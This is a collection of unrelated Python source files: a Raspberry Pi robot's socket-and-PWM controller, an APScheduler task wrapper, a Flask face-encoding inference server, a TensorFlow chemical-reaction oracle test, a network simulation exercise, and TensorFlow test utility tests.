scp {PATH TO THIS} pi@raspberrypi:~/Desktop/
*** this exact command is for my computer only, use: ***
scp ~/Documents/Code/python/gunn-pi/{THIS}.py pi@raspberrypi:~/Desktop/
'''
### Server Stuff
SERVER = "0.0.0.0" # 169.254.209.111
PORT = 6762
s = socket.socket()
s.bind((SERVER, PORT))
s.listen(1024)
def messageCatcher(inputs, _):
while True:
c, addr = s.accept() # Establish connection with client.
try:
print 'client connected:'+str(addr)
while True:
data = c.recv(1024)
#print data
if data.startswith("data:"):
data, _ = data.split(';', 1)
_, x_axis, y_axis, z_axis, switch_axis, button_11, button_12 = data.split()
inputs['x_axis'] = float(x_axis)
inputs['y_axis'] = float(y_axis)
inputs['z_axis'] = float(z_axis)
inputs['switch_axis'] = float(switch_axis)
inputs['button_11'] = int(button_11)
inputs['button_12'] = int(button_12)
c.sendall("battery:"+str(inputs['battery'])+";")
if data:
c.sendall('ping;')
else:
print 'Donnection died'
break
finally:
c.close()
def mainProcess(inputs, _):
### Variables global to the main process
# Base Control
pwm = PWM(0x40)
pwm.setPWMFreq(60)
# Negates inputs within the threshold and returns remaining values as
# their corresponding -1 through 1 values. And rounds to two decimals.
#
# Only useful for analog/axial inputs
def inputFilter(x):
thresh_hold = 0.1
if x < 0:
thresh_hold = -thresh_hold
x = min(thresh_hold, x)
x = x - thresh_hold
ratio = 1 / (1 - abs(thresh_hold))
x = x * ratio
else:
x = max(thresh_hold, x)
x = x - thresh_hold
ratio = 1 / (1 - abs(thresh_hold))
x = x * ratio
return round(x, 2)
while True:
# Filter the inputs through 'inputFilter()'
x_axis = -1 * inputFilter(inputs['x_axis'])
y_axis = -1 * inputFilter(inputs['y_axis'])
z_axis = -1 * inputFilter(inputs['z_axis'])
switch_axis = inputFilter(inputs['switch_axis'])
print(x_axis)
print(y_axis)
print(z_axis)
print(switch_axis)
horizontal_power = (x_axis * 4) + 7
vertical_power = (y_axis * 4) + 7
print("longitudinal movement: " + str(vertical_power))
print("strafe movement: " + str(horizontal_power))
print(" ")
#MAX = 650
#MIN = 150
motor_speed_PWM = int(x_axis * 240 + 405)
print motor_speed_PWM
pwm.setPWM(0, 0, motor_speed_PWM)
# Mecanum-Wheel equation
#m1_duty_cycle = min(11, max(3, ((y_axis - x_axis - z_axis) * 4) + 7))
#m3_duty_cycle = min(11, max(3, ((y_axis - x_axis + z_axis) * 4) + 7))
#m2_duty_cycle = min(11, max(3, ((y_axis + x_axis - z_axis) * 4) + 7))
#m4_duty_cycle = min(11, max(3, ((y_axis + x_axis + z_axis) * 4) + 7))
# Omni-Wheel equation
# m1_duty_cycle = min(11, max(3, (-1 * (x_axis - (-1 * z_axis)) * 4) + 7))
# m3_duty_cycle = min(11, max(3, ( 1 * (x_axis + (-1 * z_axis)) * 4) + 7))
# m2_duty_cycle = min(11, max(3, (-1 * (y_axis - (-1 * z_axis)) * 4) + 7))
# m4_duty_cycle = min(11, max(3, ( 1 * (y_axis + (-1 * z_axis)) * 4) + 7))
# Lift speed
#mL_duty_cycle = min(11, max(3, ((switch_axis) * 4) + 7))
# Sweeper drum speed
#mS_duty_cycle = min(11, max(3, ((y_axis + x_axis + z_axis) * 4) + 7))
#print("Motor 1: " + str(m1_duty_cycle))
#sH.ChangeDutyCycle(sH_duty_cycle)
#m1.ChangeDutyCycle(horizontal_power) # between 2.5 & 12.5
time.sleep(0.05)
os.system('clear') # Clear screen for Mac and Linux
if __name__ == "__main__":
manager = Manager()
inputs = manager.dict()
inputs['x_axis'] = 0
inputs['y_axis'] = 0
inputs['z_axis'] = 0
inputs['switch_axis'] = 0
inputs['battery'] = 0
# - multiprocessing runs a separate instance of python, typical
# global variables are not shared between child processes
mC = Process(target=messageCatcher, args=(inputs, 1))
mP = Process(target=mainProcess, args=(inputs, 1))
mC.start()
mP.start()
mC.join()
mP.join()
|
tasks.py
|
import json, threading
import apscheduler
from apscheduler.schedulers.background import BackgroundScheduler
from apscheduler.triggers.interval import IntervalTrigger as trigger
from apscheduler import events
from time import sleep
from components.logger import Logger
from datetime import datetime
class Tasks:
def __init__(self, Database):
self.logger = Logger("Tasks").logger
self.db = Database
#self.schedule = AsyncIOScheduler()
self.schedule = BackgroundScheduler()
self.threadlist = []
self.uilist = []
def createtask(self, functarget, count, unit, tag="[module]"):
#task = getattr(schedule.every(count), unit).do(functarget).tag(tag)
kwargs = {unit: count}
self.logger(f"scheduled module {tag} to run every {count} {unit}", "debug")
task = self.schedule.add_job(functarget, trigger(**kwargs), jitter=10, misfire_grace_time=None)
#self.logger(task, "debug")
return task
def createthreadedtask(self, functarget, argdict={}):
task = threading.Thread(target=functarget, kwargs=argdict)
#task = self.schedule.add_job(task.start)
self.threadlist.append(task)
return task
def removetask(self, task):
self.logger(f"Removing task: {task}", "debug")
task.remove()
def pause(self, target):
# check if target in membase. if so, stop execution
taskdict = self.db.membase["taskdict"]
if target in taskdict and "task" in taskdict[target]:
job = taskdict[target]["task"]
job.pause()
self.logger(f"Paused: {target}")
def resume(self, target):
taskdict = self.db.membase["taskdict"]
if target in taskdict:
job = taskdict[target]["task"]
job.pause()
self.logger(f"Resumed: {target}")
def run(self):
self.logger("running everything")
for task in self.threadlist:
task.start()
self.schedule.start()
def getjobs(self):
self.schedule.print_jobs()
return self.schedule.get_jobs()
def getjobname(self, jobid=None):
tmpjoblist = self.schedule.get_jobs()
jobdict = {}
for job in tmpjoblist:
name = job.name
job = job.id
jobdict[job] = name
if jobid in jobdict:
name = jobdict[jobid]
classname, funcname = name.split(".")
return classname, funcname
return 404, 404
def addlistener(self, function):
self.schedule.add_listener(function, mask=4096)
|
server_inference.py
|
import argparse
import torch
import numpy as np
import sys
import os
import dlib
import PIL
import threading
import flask
import queue
import io
sys.path.append(".")
sys.path.append("..")
from configs import data_configs, paths_config
from utils.model_utils import setup_model
from utils.alignment import align_face, NumberOfFacesError
dlib_shape_predictor = dlib.shape_predictor(paths_config.model_paths['shape_predictor'])
PIL.Image.MAX_IMAGE_PIXELS = 8192 * 4096 # protect against decompression bomb DOS attacks
app = flask.Flask(__name__)
job_queue = queue.Queue()
class EncodeJob:
def __init__(self, img, name, align):
self.img = img
self.align = align
self.name = name
self.evt = threading.Event()
self.did_align = False
def __str__(self):
return self.name
def set_result(self, latent):
self.latent = latent
self.evt.set()
def wait_for_result(self, timeout):
if self.evt.wait(timeout):
return self.latent
else:
return None
@app.route('/api/encodeimage/', methods=['POST'])
def encode_image():
tryalign = flask.request.form.get('tryalign', 'false')
do_align = tryalign.lower() == 'true'
file = flask.request.files['usrimg']
if not file:
return flask.Response('No file uploaded for usrimg', status=400)
img = PIL.Image.open(file.stream)
img = img.convert("RGB") # processing steps are expecting an RGB image
job = EncodeJob(img, 'user uploaded file', do_align)
job_queue.put(job)
latent = job.wait_for_result(15)
if latent is None:
raise Exception("Encoding image failed or timed out")
did_align = job.did_align == True
return flask.jsonify({'dlatent': latent.tolist(), 'did_align': did_align})
def run_alignment(img):
try:
aligned_image = align_face(filepath=None, predictor=dlib_shape_predictor, img=img)
print("Aligned image has shape: {}".format(aligned_image.size))
return aligned_image
except NumberOfFacesError:
return None
def get_latents(net, x, is_cars=False):
codes = net.encoder(x)
if net.opts.start_from_latent_avg:
if codes.ndim == 2:
codes = codes + net.latent_avg.repeat(codes.shape[0], 1, 1)[:, 0, :]
else:
codes = codes + net.latent_avg.repeat(codes.shape[0], 1, 1)
if codes.shape[1] == 18 and is_cars:
codes = codes[:, :16, :]
return codes
def get_all_latents(net, batches, is_cars=False):
all_latents = []
with torch.no_grad():
for batch in batches:
x = batch
inputs = x.to(device).float()
latents = get_latents(net, inputs, is_cars)
all_latents.append(latents)
return torch.cat(all_latents)
def get_batch(batchsize):
yield job_queue.get(True) # will block until it gets a job
for i in range(batchsize-1):
if not job_queue.empty():
yield job_queue.get_nowait()
def worker(ckpt, batch_size):
net, opts = setup_model(ckpt, device)
is_cars = 'car' in opts.dataset_type
dataset_args = data_configs.DATASETS[opts.dataset_type]
transforms_dict = dataset_args['transforms'](opts).get_transforms()
transform = transforms_dict['transform_inference']
print("Worker ready")
while True:
jobs = list(get_batch(batch_size))
app.logger.info(f"Running jobs {[str(job) for job in jobs]}")
imgs = []
for job in jobs:
if job.align:
aligned = run_alignment(job.img)
if aligned is None:
imgs.append(job.img)
else:
imgs.append(aligned)
job.did_align = True
else:
imgs.append(job.img)
batch = torch.stack([transform(img) for img in imgs])
latents = get_all_latents(net, [batch], is_cars=is_cars)
latents = latents.cpu()
for latent, job in zip(latents, jobs):
job.set_result(np.array(latent))
app.logger.info("Finished batch job")
def main(args):
t1 = threading.Thread(target=worker, args=[args.ckpt, args.batch])
t1.daemon = True # kill thread on program termination (to allow keyboard interrupt)
t1.start()
app.config['TEMPLATES_AUTO_RELOAD'] = True # for debugging
app.config['MAX_CONTENT_LENGTH'] = 16 * 1024 * 1024 # limit to 16mb
app.run(host="0.0.0.0", port=args.api_port)
app.logger.info("Closing server_inference")
if __name__ == "__main__":
device = "cuda"
parser = argparse.ArgumentParser(description="Run a flask server to do e4e inference on images")
parser.add_argument("--batch", type=int, default=1, metavar="BATCH_SIZE", help="batch size for the generator")
parser.add_argument("--api-port", type=int, default=8080, metavar="PORT", help="port to listen on (default 8080)")
parser.add_argument("--ckpt", default="pretrained_models/e4e_ffhq_encode.pt", metavar="CHECKPOINT", help="path to generator checkpoint")
args = parser.parse_args()
main(args)
|
oracletest.py
|
import tensorflow as tf
from utils.nn import linearND, linear
from mol_graph import atom_fdim as adim, bond_fdim as bdim, max_nb, smiles2graph, smiles2graph_test, bond_types
from models import *
import math, sys, random
from optparse import OptionParser
import threading
from multiprocessing import Queue
import rdkit
from rdkit import Chem
TOPK = 5
parser = OptionParser()
parser.add_option("-t", "--test", dest="test_path")
parser.add_option("-p", "--cand", dest="cand_path", default=None)
parser.add_option("-a", "--ncand", dest="cand_size", default=500)
parser.add_option("-c", "--ncore", dest="core_size", default=10)
parser.add_option("-m", "--model", dest="model_path")
parser.add_option("-w", "--hidden", dest="hidden_size", default=100)
parser.add_option("-d", "--depth", dest="depth", default=1)
opts,args = parser.parse_args()
hidden_size = int(opts.hidden_size)
depth = int(opts.depth)
core_size = int(opts.core_size)
MAX_NCAND = int(opts.cand_size)
#gpu_options = tf.GPUOptions(allow_growth=True)
#session = tf.Session(config=tf.ConfigProto(gpu_options=gpu_options))
session = tf.Session()
_input_atom = tf.placeholder(tf.float32, [None, None, adim])
_input_bond = tf.placeholder(tf.float32, [None, None, bdim])
_atom_graph = tf.placeholder(tf.int32, [None, None, max_nb, 2])
_bond_graph = tf.placeholder(tf.int32, [None, None, max_nb, 2])
_num_nbs = tf.placeholder(tf.int32, [None, None])
_src_holder = [_input_atom, _input_bond, _atom_graph, _bond_graph, _num_nbs]
q = tf.FIFOQueue(100, [tf.float32, tf.float32, tf.int32, tf.int32, tf.int32])
enqueue = q.enqueue(_src_holder)
input_atom, input_bond, atom_graph, bond_graph, num_nbs = q.dequeue()
input_atom.set_shape([None, None, adim])
input_bond.set_shape([None, None, bdim])
atom_graph.set_shape([None, None, max_nb, 2])
bond_graph.set_shape([None, None, max_nb, 2])
num_nbs.set_shape([None, None])
graph_inputs = (input_atom, input_bond, atom_graph, bond_graph, num_nbs)
with tf.variable_scope("mol_encoder"):
fp_all_atoms = rcnn_wl_only(graph_inputs, hidden_size=hidden_size, depth=depth)
reactant = fp_all_atoms[0:1,:]
candidates = fp_all_atoms[1:,:]
candidates = candidates - reactant
candidates = tf.concat(0, [reactant, candidates])
with tf.variable_scope("diff_encoder"):
reaction_fp = wl_diff_net(graph_inputs, candidates, hidden_size=hidden_size, depth=depth)
reaction_fp = reaction_fp[1:]
reaction_fp = tf.nn.relu(linear(reaction_fp, hidden_size, "rex_hidden"))
score = tf.squeeze(linear(reaction_fp, 1, "score"), [1])
tk = tf.minimum(TOPK, tf.shape(score)[0])
_, pred_topk = tf.nn.top_k(score, tk)
tf.global_variables_initializer().run(session=session)
queue = Queue()
def read_data(coord):
data = []
data_f = open(opts.test_path, 'r')
cand_f = open(opts.cand_path, 'r')
for line in data_f:
items = line.split()
cand = cand_f.readline()
r = items[0]
edits = items[2]
gbonds = []
delbond = edits.split(';')[2]
newbond = edits.split(';')[3]
if len(delbond) > 0:
for s in delbond.split(','):
x,y,_ = s.split('-')
x,y = int(x)-1,int(y)-1
x,y = min(x,y),max(x,y)
gbonds.append((x,y,0))
if len(newbond) > 0:
for s in newbond.split(','):
x,y,t = s.split('-')
if float(t) == 1.5: t = 4
else: t = int(float(t))
x,y = int(x)-1,int(y)-1
x,y = min(x,y),max(x,y)
gbonds.append((x,y,t))
rex_core = set([(x,y) for x,y,_ in gbonds])
cand_bonds = list(rex_core)
for b in cand.strip("\r\n ").split():
x,y = b.split('-')
x,y = int(x)-1,int(y)-1
if (x,y) not in rex_core:
cand_bonds.append((x,y))
data.append((r,cand_bonds,gbonds))
data_len = len(data)
for it in xrange(data_len):
r,cand_bonds,gold_bonds = data[it]
r = r.split('>')[0]
ncore = core_size
while True:
src_tuple,conf = smiles2graph(r, cand_bonds[:ncore], gold_bonds, cutoff=-1)
if len(conf) <= MAX_NCAND:
break
ncore -= 1
queue.put((r,conf))
feed_map = {x:y for x,y in zip(_src_holder, src_tuple)}
session.run(enqueue, feed_dict=feed_map)
coord = tf.train.Coordinator()
t = threading.Thread(target=read_data, args=(coord,))
t.start()
saver = tf.train.Saver()
saver.restore(session, tf.train.latest_checkpoint(opts.model_path))
total = 0
idxfunc = lambda x:x.GetIntProp('molAtomMapNumber')
try:
while not coord.should_stop():
total += 1
r,conf = queue.get()
cur_pred = session.run(pred_topk)
rmol = Chem.MolFromSmiles(r)
rbonds = {}
for bond in rmol.GetBonds():
a1 = idxfunc(bond.GetBeginAtom())
a2 = idxfunc(bond.GetEndAtom())
t = bond_types.index(bond.GetBondType()) + 1
a1,a2 = min(a1,a2),max(a1,a2)
rbonds[(a1,a2)] = t
for idx in cur_pred:
for x,y,t in conf[idx]:
x,y = x+1,y+1
if ((x,y) not in rbonds and t > 0) or ((x,y) in rbonds and rbonds[(x,y)] != t):
print '%d-%d-%d' % (x,y,t),
print '|',
print
if total % 1000 == 0:
sys.stdout.flush()
except Exception as e:
print e
coord.request_stop(e)
finally:
coord.request_stop()
coord.join([t])
|
simulation_2.py
|
'''
Created on Oct 12, 2016
@author: mwittie
'''
import network_2
import link_2
import threading
from time import sleep
##configuration parameters
router_queue_size = 0 # 0 means unlimited
simulation_time = 4 # give the network sufficient time to transfer all packets before quitting
if __name__ == '__main__':
object_L = [] # keeps track of objects, so we can kill their threads
# create network nodes
client = network_2.Host(1)
object_L.append(client)
server = network_2.Host(2)
object_L.append(server)
router_a = network_2.Router(name='A', intf_count=1, max_queue_size=router_queue_size)
object_L.append(router_a)
# create a Link Layer to keep track of links between network nodes
link_layer = link_2.LinkLayer()
object_L.append(link_layer)
# add all the links
# link parameters: from_node, from_intf_num, to_node, to_intf_num, mtu
# out interface of client, in interface of server
# 50 is the MTU - largest size of packet that can be transferred over links
link_layer.add_link(link_2.Link(client, 0, router_a, 0, 50))
link_layer.add_link(link_2.Link(router_a, 0, server, 0, 30))
# start all the objects
thread_L = []
thread_L.append(threading.Thread(name=client.__str__(), target=client.run))
thread_L.append(threading.Thread(name=server.__str__(), target=server.run))
thread_L.append(threading.Thread(name=router_a.__str__(), target=router_a.run))
thread_L.append(threading.Thread(name="Network", target=link_layer.run))
for t in thread_L:
t.start()
# create some send events
#message = 'THIS IS DATA MESSAGE 0, THIS MESSAGE IS AT LEAST 80 CHARACTERS LONG AND NEEDS TO BE SPLIT'
#client.udt_send(2, message)
for i in range(3):
message = 'this is data message %d, this message is at least 80 characters long that needs to be split' % i
client.udt_send(2, message, i)
'''
if len(message) > 50:
message_1 = message[0:45]
client.udt_send(2, message_1)
message_2 = message[45:100]
client.udt_send(2, message_2)
else:
client.udt_send(2, message)
'''
# give the network sufficient time to transfer all packets before quitting
sleep(simulation_time)
# join all threads
for o in object_L:
o.stop = True
for t in thread_L:
t.join()
print("All simulation threads joined")
# writes to host periodically
|
test_util_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.test_util."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import random
import threading
import weakref
import numpy as np
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import meta_graph_pb2
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_ops # pylint: disable=unused-import
from tensorflow.python.framework import test_util
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
class TestUtilTest(test_util.TensorFlowTestCase):
def test_assert_ops_in_graph(self):
with self.test_session():
constant_op.constant(["hello", "taffy"], name="hello")
test_util.assert_ops_in_graph({"hello": "Const"}, ops.get_default_graph())
self.assertRaises(ValueError, test_util.assert_ops_in_graph,
{"bye": "Const"}, ops.get_default_graph())
self.assertRaises(ValueError, test_util.assert_ops_in_graph,
{"hello": "Variable"}, ops.get_default_graph())
def test_session_functions(self):
with self.test_session() as sess:
sess_ref = weakref.ref(sess)
with self.cached_session(graph=None, config=None) as sess2:
# We make sure that sess2 is sess.
assert sess2 is sess
# We make sure we raise an exception if we use cached_session with
# different values.
with self.assertRaises(ValueError):
with self.cached_session(graph=ops.Graph()) as sess2:
pass
with self.assertRaises(ValueError):
with self.cached_session(force_gpu=True) as sess2:
pass
# We make sure that test_session will cache the session even after the
# with scope.
assert not sess_ref()._closed
with self.session() as unique_sess:
unique_sess_ref = weakref.ref(unique_sess)
with self.session() as sess2:
assert sess2 is not unique_sess
# We make sure the session is closed when we leave the with statement.
assert unique_sess_ref()._closed
def test_assert_equal_graph_def(self):
with ops.Graph().as_default() as g:
def_empty = g.as_graph_def()
constant_op.constant(5, name="five")
constant_op.constant(7, name="seven")
def_57 = g.as_graph_def()
with ops.Graph().as_default() as g:
constant_op.constant(7, name="seven")
constant_op.constant(5, name="five")
def_75 = g.as_graph_def()
# Comparing strings is order dependent
self.assertNotEqual(str(def_57), str(def_75))
# assert_equal_graph_def doesn't care about order
test_util.assert_equal_graph_def(def_57, def_75)
# Compare two unequal graphs
with self.assertRaisesRegexp(AssertionError,
r"^Found unexpected node '{{node seven}}"):
test_util.assert_equal_graph_def(def_57, def_empty)
def testIsGoogleCudaEnabled(self):
# The test doesn't assert anything. It ensures the py wrapper
# function is generated correctly.
if test_util.IsGoogleCudaEnabled():
print("GoogleCuda is enabled")
else:
print("GoogleCuda is disabled")
def testIsBuiltWithROCm(self):
# The test doesn't assert anything. It ensures the py wrapper
# function is generated correctly.
if test_util.IsBuiltWithROCm():
print("Tensorflow build has ROCm support")
else:
print("Tensorflow build does not have ROCm support")
def testIsMklEnabled(self):
# This test doesn't assert anything.
# It ensures the py wrapper function is generated correctly.
if test_util.IsMklEnabled():
print("MKL is enabled")
else:
print("MKL is disabled")
@test_util.run_in_graph_and_eager_modes
def testAssertProtoEqualsStr(self):
graph_str = "node { name: 'w1' op: 'params' }"
graph_def = graph_pb2.GraphDef()
text_format.Merge(graph_str, graph_def)
# test string based comparison
self.assertProtoEquals(graph_str, graph_def)
# test original comparison
self.assertProtoEquals(graph_def, graph_def)
@test_util.run_in_graph_and_eager_modes
def testAssertProtoEqualsAny(self):
# Test assertProtoEquals with a protobuf.Any field.
meta_graph_def_str = """
meta_info_def {
meta_graph_version: "outer"
any_info {
[type.googleapis.com/tensorflow.MetaGraphDef] {
meta_info_def {
meta_graph_version: "inner"
}
}
}
}
"""
meta_graph_def_outer = meta_graph_pb2.MetaGraphDef()
meta_graph_def_outer.meta_info_def.meta_graph_version = "outer"
meta_graph_def_inner = meta_graph_pb2.MetaGraphDef()
meta_graph_def_inner.meta_info_def.meta_graph_version = "inner"
meta_graph_def_outer.meta_info_def.any_info.Pack(meta_graph_def_inner)
self.assertProtoEquals(meta_graph_def_str, meta_graph_def_outer)
self.assertProtoEquals(meta_graph_def_outer, meta_graph_def_outer)
# Check if the assertion failure message contains the content of
# the inner proto.
with self.assertRaisesRegexp(AssertionError,
r'meta_graph_version: "inner"'):
self.assertProtoEquals("", meta_graph_def_outer)
@test_util.run_in_graph_and_eager_modes
def testNDArrayNear(self):
a1 = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
a2 = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
a3 = np.array([[10.0, 20.0, 30.0], [40.0, 50.0, 60.0]])
self.assertTrue(self._NDArrayNear(a1, a2, 1e-5))
self.assertFalse(self._NDArrayNear(a1, a3, 1e-5))
@test_util.run_in_graph_and_eager_modes
def testCheckedThreadSucceeds(self):
def noop(ev):
ev.set()
event_arg = threading.Event()
self.assertFalse(event_arg.is_set())
t = self.checkedThread(target=noop, args=(event_arg,))
t.start()
t.join()
self.assertTrue(event_arg.is_set())
@test_util.run_in_graph_and_eager_modes
def testCheckedThreadFails(self):
def err_func():
return 1 // 0
t = self.checkedThread(target=err_func)
t.start()
with self.assertRaises(self.failureException) as fe:
t.join()
self.assertTrue("integer division or modulo by zero" in str(fe.exception))
@test_util.run_in_graph_and_eager_modes
def testCheckedThreadWithWrongAssertionFails(self):
x = 37
def err_func():
self.assertTrue(x < 10)
t = self.checkedThread(target=err_func)
t.start()
with self.assertRaises(self.failureException) as fe:
t.join()
self.assertTrue("False is not true" in str(fe.exception))
@test_util.run_in_graph_and_eager_modes
def testMultipleThreadsWithOneFailure(self):
def err_func(i):
self.assertTrue(i != 7)
threads = [
self.checkedThread(
target=err_func, args=(i,)) for i in range(10)
]
for t in threads:
t.start()
for i, t in enumerate(threads):
if i == 7:
with self.assertRaises(self.failureException):
t.join()
else:
t.join()
def _WeMustGoDeeper(self, msg):
with self.assertRaisesOpError(msg):
with ops.Graph().as_default():
node_def = ops._NodeDef("IntOutput", "name")
node_def_orig = ops._NodeDef("IntOutput", "orig")
op_orig = ops.Operation(node_def_orig, ops.get_default_graph())
op = ops.Operation(node_def, ops.get_default_graph(),
original_op=op_orig)
raise errors.UnauthenticatedError(node_def, op, "true_err")
@test_util.run_in_graph_and_eager_modes
def testAssertRaisesOpErrorDoesNotPassMessageDueToLeakedStack(self):
with self.assertRaises(AssertionError):
self._WeMustGoDeeper("this_is_not_the_error_you_are_looking_for")
self._WeMustGoDeeper("true_err")
self._WeMustGoDeeper("name")
self._WeMustGoDeeper("orig")
@test_util.run_in_graph_and_eager_modes
def testAllCloseTensors(self):
a_raw_data = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
a = constant_op.constant(a_raw_data)
b = math_ops.add(1, constant_op.constant([[0, 1, 2], [3, 4, 5], [6, 7, 8]]))
self.assertAllClose(a, b)
self.assertAllClose(a, a_raw_data)
a_dict = {"key": a}
b_dict = {"key": b}
self.assertAllClose(a_dict, b_dict)
x_list = [a, b]
y_list = [a_raw_data, b]
self.assertAllClose(x_list, y_list)
@test_util.run_in_graph_and_eager_modes
def testAllCloseScalars(self):
self.assertAllClose(7, 7 + 1e-8)
with self.assertRaisesRegexp(AssertionError, r"Not equal to tolerance"):
self.assertAllClose(7, 7 + 1e-5)
@test_util.run_in_graph_and_eager_modes
def testAllCloseDictToNonDict(self):
with self.assertRaisesRegexp(ValueError, r"Can't compare dict to non-dict"):
self.assertAllClose(1, {"a": 1})
with self.assertRaisesRegexp(ValueError, r"Can't compare dict to non-dict"):
self.assertAllClose({"a": 1}, 1)
@test_util.run_in_graph_and_eager_modes
def testAllCloseNamedtuples(self):
a = 7
b = (2., 3.)
c = np.ones((3, 2, 4)) * 7.
expected = {"a": a, "b": b, "c": c}
my_named_tuple = collections.namedtuple("MyNamedTuple", ["a", "b", "c"])
# Identity.
self.assertAllClose(expected, my_named_tuple(a=a, b=b, c=c))
self.assertAllClose(
my_named_tuple(a=a, b=b, c=c), my_named_tuple(a=a, b=b, c=c))
@test_util.run_in_graph_and_eager_modes
def testAllCloseDicts(self):
a = 7
b = (2., 3.)
c = np.ones((3, 2, 4)) * 7.
expected = {"a": a, "b": b, "c": c}
# Identity.
self.assertAllClose(expected, expected)
self.assertAllClose(expected, dict(expected))
# With each item removed.
for k in expected:
actual = dict(expected)
del actual[k]
with self.assertRaisesRegexp(AssertionError, r"mismatched keys"):
self.assertAllClose(expected, actual)
# With each item changed.
with self.assertRaisesRegexp(AssertionError, r"Not equal to tolerance"):
self.assertAllClose(expected, {"a": a + 1e-5, "b": b, "c": c})
with self.assertRaisesRegexp(AssertionError, r"Shape mismatch"):
self.assertAllClose(expected, {"a": a, "b": b + (4.,), "c": c})
c_copy = np.array(c)
c_copy[1, 1, 1] += 1e-5
with self.assertRaisesRegexp(AssertionError, r"Not equal to tolerance"):
self.assertAllClose(expected, {"a": a, "b": b, "c": c_copy})
@test_util.run_in_graph_and_eager_modes
def testAllCloseListOfNamedtuples(self):
my_named_tuple = collections.namedtuple("MyNamedTuple", ["x", "y"])
l1 = [
my_named_tuple(x=np.array([[2.3, 2.5]]), y=np.array([[0.97, 0.96]])),
my_named_tuple(x=np.array([[3.3, 3.5]]), y=np.array([[0.98, 0.99]]))
]
l2 = [
([[2.3, 2.5]], [[0.97, 0.96]]),
([[3.3, 3.5]], [[0.98, 0.99]]),
]
self.assertAllClose(l1, l2)
@test_util.run_in_graph_and_eager_modes
def testAllCloseNestedStructure(self):
a = {"x": np.ones((3, 2, 4)) * 7, "y": (2, [{"nested": {"m": 3, "n": 4}}])}
self.assertAllClose(a, a)
b = copy.deepcopy(a)
self.assertAllClose(a, b)
# Test mismatched values
b["y"][1][0]["nested"]["n"] = 4.2
with self.assertRaisesRegexp(AssertionError,
r"\[y\]\[1\]\[0\]\[nested\]\[n\]"):
self.assertAllClose(a, b)
@test_util.run_in_graph_and_eager_modes
def testArrayNear(self):
a = [1, 2]
b = [1, 2, 5]
with self.assertRaises(AssertionError):
self.assertArrayNear(a, b, 0.001)
a = [1, 2]
b = [[1, 2], [3, 4]]
with self.assertRaises(TypeError):
self.assertArrayNear(a, b, 0.001)
a = [1, 2]
b = [1, 2]
self.assertArrayNear(a, b, 0.001)
def testForceGPU(self):
with self.assertRaises(errors.InvalidArgumentError):
with self.test_session(force_gpu=True):
# this relies on us not having a GPU implementation for assert, which
# seems sensible
x = constant_op.constant(True)
y = [15]
control_flow_ops.Assert(x, y).run()
@test_util.run_in_graph_and_eager_modes
def testAssertAllCloseAccordingToType(self):
# test plain int
self.assertAllCloseAccordingToType(1, 1, rtol=1e-8, atol=1e-8)
# test float64
self.assertAllCloseAccordingToType(
np.asarray([1e-8], dtype=np.float64),
np.asarray([2e-8], dtype=np.float64),
rtol=1e-8, atol=1e-8
)
self.assertAllCloseAccordingToType(
constant_op.constant([1e-8], dtype=dtypes.float64),
constant_op.constant([2e-8], dtype=dtypes.float64),
rtol=1e-8,
atol=1e-8)
with (self.assertRaises(AssertionError)):
self.assertAllCloseAccordingToType(
np.asarray([1e-7], dtype=np.float64),
np.asarray([2e-7], dtype=np.float64),
rtol=1e-8, atol=1e-8
)
# test float32
self.assertAllCloseAccordingToType(
np.asarray([1e-7], dtype=np.float32),
np.asarray([2e-7], dtype=np.float32),
rtol=1e-8, atol=1e-8,
float_rtol=1e-7, float_atol=1e-7
)
self.assertAllCloseAccordingToType(
constant_op.constant([1e-7], dtype=dtypes.float32),
constant_op.constant([2e-7], dtype=dtypes.float32),
rtol=1e-8,
atol=1e-8,
float_rtol=1e-7,
float_atol=1e-7)
with (self.assertRaises(AssertionError)):
self.assertAllCloseAccordingToType(
np.asarray([1e-6], dtype=np.float32),
np.asarray([2e-6], dtype=np.float32),
rtol=1e-8, atol=1e-8,
float_rtol=1e-7, float_atol=1e-7
)
# test float16
self.assertAllCloseAccordingToType(
np.asarray([1e-4], dtype=np.float16),
np.asarray([2e-4], dtype=np.float16),
rtol=1e-8, atol=1e-8,
float_rtol=1e-7, float_atol=1e-7,
half_rtol=1e-4, half_atol=1e-4
)
self.assertAllCloseAccordingToType(
constant_op.constant([1e-4], dtype=dtypes.float16),
constant_op.constant([2e-4], dtype=dtypes.float16),
rtol=1e-8,
atol=1e-8,
float_rtol=1e-7,
float_atol=1e-7,
half_rtol=1e-4,
half_atol=1e-4)
with (self.assertRaises(AssertionError)):
self.assertAllCloseAccordingToType(
np.asarray([1e-3], dtype=np.float16),
np.asarray([2e-3], dtype=np.float16),
rtol=1e-8, atol=1e-8,
float_rtol=1e-7, float_atol=1e-7,
half_rtol=1e-4, half_atol=1e-4
)
@test_util.run_in_graph_and_eager_modes
def testAssertAllEqual(self):
i = variables.Variable([100] * 3, dtype=dtypes.int32, name="i")
j = constant_op.constant([20] * 3, dtype=dtypes.int32, name="j")
k = math_ops.add(i, j, name="k")
self.evaluate(variables.global_variables_initializer())
self.assertAllEqual([120] * 3, k)
self.assertAllEqual([20] * 3, j)
@test_util.run_in_graph_and_eager_modes
def testAssertNotAllClose(self):
# Test with arrays
self.assertNotAllClose([0.1], [0.2])
with self.assertRaises(AssertionError):
self.assertNotAllClose([-1.0, 2.0], [-1.0, 2.0])
